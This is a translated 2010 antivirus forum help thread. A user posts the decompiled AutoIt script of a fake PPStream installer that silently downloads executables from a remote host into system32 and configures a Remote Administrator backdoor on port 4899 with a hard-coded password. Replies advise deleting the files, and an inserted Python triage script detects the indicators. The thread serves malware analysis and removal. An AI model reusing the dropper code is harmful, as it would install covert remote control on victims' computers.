[Help] Possibly being remotely monitored? Analysis report updated

Board: AntiVirus   Author: (佐佐)   Time: 14 years ago (2010/03/18 22:32), edited   Push score 1 (1 push / 0 boo / 6 arrow)
7 comments, 2 participants, thread 1/1
1. Problem description: The instant I clicked it, it seemed to install something. (Shock.) I took a Print Screen capture and saw a window titled Remote Administrator Server 2.1. I looked it up and it seems to be remote-control software, but I could never find where it was installed. Later I tried many ways to unpack the shell of this exe. All of them failed; I only found out that it seems to be an auto-installer made with AutoIt. Then, with a lot of luck, I decompiled its script with AutoIt, and it is in text form. But I don't really understand it, and I'm afraid that messing around will break the system. I'd be grateful if an expert could explain it; I really want to know what it actually did to my computer OTL.
------------------------------------------------------------------------------
; <AUT2EXE VERSION: 3.2.2.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------

Opt("MouseCoordMode", 0)         ;1=absolute, 0=relative (1 is the whole screen, 0 is relative to the window)
Opt("TrayIconDebug", 1)          ;0=no info, 1=debug line info
Opt("TrayIconHide", 0)           ;0=show, 1=hide tray icon
Opt("WinDetectHiddenText", 0)    ;0=don't detect, 1=do detect
Opt("WinTitleMatchMode", 2)      ;1=start, 2=subStr, 3=exact, 4=... used to check whether a given window exists; with 2, a window matches as long as its title contains "home"
Opt("OnExitFunc","OnAutoItExit") ;"OnAutoItExit" called
Opt("TrayIconHide", 1)           ;0=show, 1=hide tray icon

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
; Include Version:1.59 (04/20/2006)
; ------------------------------------------------------------------------------
;
; AutoIt Version: 3.0
; Language:       English
; Description:    Functions that assist with process management.
;
; ------------------------------------------------------------------------------

;===============================================================================
;
; Description   - Returns a string containing the process name that belongs to a given PID.
; Syntax        - _ProcessGetName( $iPID )
; Parameters    - $iPID - The PID of a currently running process
; Requirements  - None.
; Return Values - Success - The name of the process
;                 Failure - Blank string and sets @error
;                           1 - Process doesn't exist
;                           2 - Error getting process list
;                           3 - No processes found
; Author(s)     - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes         - Supplementary to ProcessExists().
;===============================================================================
Func _ProcessGetName($i_PID)
    If Not ProcessExists($i_PID) Then
        SetError(1)
        Return ''
    EndIf
    Local $a_Processes = ProcessList()
    If Not @error Then
        For $i = 1 To $a_Processes[0][0]
            If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
        Next
    EndIf
    SetError(1)
    Return ''
EndFunc   ;==>_ProcessGetName

;===============================================================================
;
; Function Name:   _ProcessGetPriority()
; Description:     Get the priority of an open process
; Parameter(s):    $vProcess - PID or name of a process.
; Requirement(s):  AutoIt Beta v3.1.1.61+
;                  kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corresponding to
;                    the process's priority:
;                    0 - Idle/Low
;                    1 - Below Normal (Not supported on Windows 95/98/ME)
;                    2 - Normal
;                    3 - Above Normal (Not supported on Windows 95/98/ME)
;                    4 - High
;                    5 - Realtime
;                  On Failure: Returns -1 and sets @Error to 1
; Author(s):       Matthew Tucker
;                  Valik added Pid or Processname logic
;===============================================================================
;
Func _ProcessGetPriority($vProcess)
    Local $i_PID = ProcessExists($vProcess)
    If Not $i_PID Then
        SetError(1)
        Return -1
    EndIf
    Local $hDLL = DllOpen('kernel32.dll')
    Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
    Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
    DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
    DllClose($hDLL)
    Switch $aPriority[0]
        Case 0x00000040
            Return 0
        Case 0x00004000
            Return 1
        Case 0x00000020
            Return 2
        Case 0x00008000
            Return 3
        Case 0x00000080
            Return 4
        Case 0x00000100
            Return 5
        Case Else
            SetError(1)
            Return -1
    EndSwitch
EndFunc   ;==>_ProcessGetPriority

;===============================================================================
;
; Description:     Executes a DOS command in a hidden command window.
; Syntax:          _RunDOS( $sCommand )
; Parameter(s):    $sCommand - Command to execute
; Requirement(s):  None
; Return Value(s): On Success - Returns the exit code of the command
;                  On Failure - Depends on RunErrorsFatal setting
; Author(s):       Jeremy Landes <jlandes at landeserve dot com>
; Note(s):         None
;
;===============================================================================
Func _RunDOS($sCommand)
    Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc   ;==>_RunDOS

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------

$ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/"
InetGet($ServerURL & "compentent/ipsec5.exe","c:\Windows\system32\ipsec5.exe",1) ; hides the "R" tray icon in the lower-right corner
InetGet($ServerURL & "compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1)
If not ProcessExists ("ipsec4.exe") Then
    ShellExecute("c:\Windows\system32\ipsec4.exe")
    Sleep(10)
EndIf
InetGet($ServerURL & "compentent/win1logon.exe","c:\Windows\system32\win1logon.exe",1)
If not ProcessExists ("win1logon.exe") Then
    ShellExecute("c:\Windows\system32\win1logon.exe")
    Sleep(10)
EndIf
InetGet($ServerURL & "compentent/MDME.exe","c:\Windows\system32\MDME.exe",1)          ; fetch the downloader program
InetGet($ServerURL & "compentent/MDEE.exe","c:\Windows\system32\MDEE.exe",1)          ; fetch the downloader program
InetGet($ServerURL & "compentent/AdmDll.dll","c:\Windows\system32\AdmDll.dll",1)      ; fetch the downloader program
InetGet($ServerURL & "compentent/r_server.exe","c:\Windows\system32\newscript.exe",1) ; fetch the downloader program
InetGet($ServerURL & "compentent/MSWINSCK.OCX","c:\Windows\system32\MSWINSCK.OCX",1)
InetGet($ServerURL & "compentent/upload.exe","c:\Windows\system32\upload.exe",1)
InetGet($ServerURL & "compentent/down.exe","c:\Windows\system32\down.exe",1)
$rc = _RunDos("c:\Windows\system32\newscript.exe /setup")
sleep(1000)
$rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence")
$rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:119995995 /save /silence")
ProcessClose("newscript.exe")
ShellExecute("c:\Windows\system32\newscript.exe")
If not ProcessExists ("MDME.exe") Then
    IF FileGetSize("c:\Windows\system32\MDME.exe")<>0 Then
        ShellExecute("c:\Windows\system32\MDME.exe")
    EndIf
EndIf
If not ProcessExists ("MDEE.exe") Then
    ShellExecute("c:\Windows\system32\MDEE.exe")
EndIf
If not ProcessExists ("PPStream.exe") Then
    ShellExecute(@WorkingDir & "\FILES\" & "PPStream.exe")
EndIf

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------
------------------------------------------------------------------------------
2. System information: Windows XP SP3, Avast
3. Analysis reports:
http://sun.cis.scu.edu.tw/~92a39/upload/38713.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38715.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38716.txt
--
※ Posted from: 批踢踢實業坊(ptt.cc) ◆ From: 122.116.171.101
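As an added example that is not part of the original post or any reply, here is a Python triage script for a decompiled AutoIt dropper like the one quoted above. It pulls out the indicators a responder needs from the script text: the URLs fetched with InetGet and the local path each file is written to, the programs launched with ShellExecute/_RunDos and their arguments, and the listening port the remote-admin server is configured with. It then compares those indicators against a snapshot of a host (a list of existing file paths plus the text of `netstat -an`). The sample script text is a constructed subset of the post's lines with the /pass: value masked, the netstat excerpt is constructed, and the DropperReport class and function names are my own.

```python
"""Static triage of a decompiled AutoIt dropper, plus a host check for its indicators.

Added example, not code from the post or its author.  Given the text of a
decompiled .au3 script, extract: remote URLs fetched with InetGet and where
each file is written; programs started via ShellExecute/_RunDos and their
arguments; the listening port configured on the dropped remote-admin server.
Then compare those indicators against a host snapshot (existing paths and
`netstat -an` output).
"""
import re
from dataclasses import dataclass, field

# Constructed subset of the decompiled Setup.au3 quoted in the post; the
# /pass: value is masked here, the other lines are as quoted.
SAMPLE_AU3 = r'''
$ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/"
InetGet($ServerURL & "compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1)
InetGet($ServerURL & "compentent/AdmDll.dll","c:\Windows\system32\AdmDll.dll",1)
InetGet($ServerURL & "compentent/r_server.exe","c:\Windows\system32\newscript.exe",1)
If not ProcessExists ("ipsec4.exe") Then
    ShellExecute("c:\Windows\system32\ipsec4.exe")
EndIf
$rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence")
$rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:MASKED /save /silence")
ShellExecute("c:\Windows\system32\newscript.exe")
'''

# Constructed `netstat -an` excerpt from a host where the server is listening.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4899           0.0.0.0:0              LISTENING
  TCP    192.168.0.5:1052       203.0.113.7:80         ESTABLISHED
"""


@dataclass
class DropperReport:
    server_urls: dict = field(default_factory=dict)  # $Variable -> base URL
    downloads: list = field(default_factory=list)    # (remote URL, local path)
    executed: list = field(default_factory=list)     # (program path, [args])
    listen_ports: list = field(default_factory=list)
    sets_password: bool = False

    def dropped_files(self):
        return sorted({local for _, local in self.downloads})


_ASSIGN = re.compile(r'^\s*\$(\w+)\s*=\s*"([^"]*)"', re.M)
_INETGET = re.compile(r'InetGet\(\s*(?:\$(\w+)\s*&\s*)?"([^"]*)"\s*,\s*"([^"]*)"')
_EXEC = re.compile(r'(?:ShellExecute|_RunDos|RunWait|Run)\(\s*"([^"]*)"', re.I)


def triage_au3(text):
    """Scan the script text once per indicator type and fill a DropperReport."""
    rep = DropperReport()
    for var, value in _ASSIGN.findall(text):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            rep.server_urls[var] = value
    for var, remote, local in _INETGET.findall(text):
        if var:  # URL built as $ServerURL & "relative/part"
            remote = rep.server_urls.get(var, "$" + var) + remote
        rep.downloads.append((remote, local))
    for cmdline in _EXEC.findall(text):
        parts = cmdline.split()  # paths quoted here contain no spaces
        path, args = parts[0], parts[1:]
        rep.executed.append((path, args))
        for arg in args:
            m = re.match(r"/port:(\d+)$", arg, re.I)
            if m:
                rep.listen_ports.append(int(m.group(1)))
            if arg.lower().startswith("/pass:"):
                rep.sets_password = True  # record that a password was set, never its value
    rep.listen_ports = sorted(set(rep.listen_ports))
    return rep


def match_indicators(rep, existing_paths, netstat_text):
    """Return (dropped files present on the host, report ports seen LISTENING)."""
    existing = {p.lower() for p in existing_paths}
    files_found = [p for p in rep.dropped_files() if p.lower() in existing]
    ports_found = set()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[0].upper() == "TCP" and f[-1].upper() == "LISTENING":
            port = int(f[1].rsplit(":", 1)[1])
            if port in rep.listen_ports:
                ports_found.add(port)
    return files_found, sorted(ports_found)


if __name__ == "__main__":
    report = triage_au3(SAMPLE_AU3)
    for remote, local in report.downloads:
        print("downloads", remote, "->", local)
    for path, args in report.executed:
        print("executes", path, " ".join(args))
    print("listening port(s):", report.listen_ports, "password set:", report.sets_password)
    host_paths = [r"C:\Windows\System32\newscript.exe"]  # constructed host snapshot
    print("on host:", match_indicators(report, host_paths, SAMPLE_NETSTAT))
```

Run it on the full decompiled script to get the list of files to remove from system32 and the port to look for in `netstat -an`; the host check only needs a directory listing and netstat text, so it works on an XP machine without installing anything.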

03/18 23:02, 1F  Delete it.
03/18 23:02, 2F
03/18 23:03, 3F  Delete the files it created.
03/18 23:08, 4F  Thanks, moderator <(_ _)>
03/18 23:20, 5F  Also, if you use the built-in Windows firewall,
03/18 23:21, 6F  close this port: 4899.
03/18 23:21, 7F  Just in case, please run a scan using the pinned help-request format and paste the report.
※ Edited: epyonwing from 122.116.171.101 (03/19 18:30)
※ Edited: epyonwing from 122.116.171.101 (03/19 18:41)
Article ID (AID): #1BeZbuo_ (AntiVirus)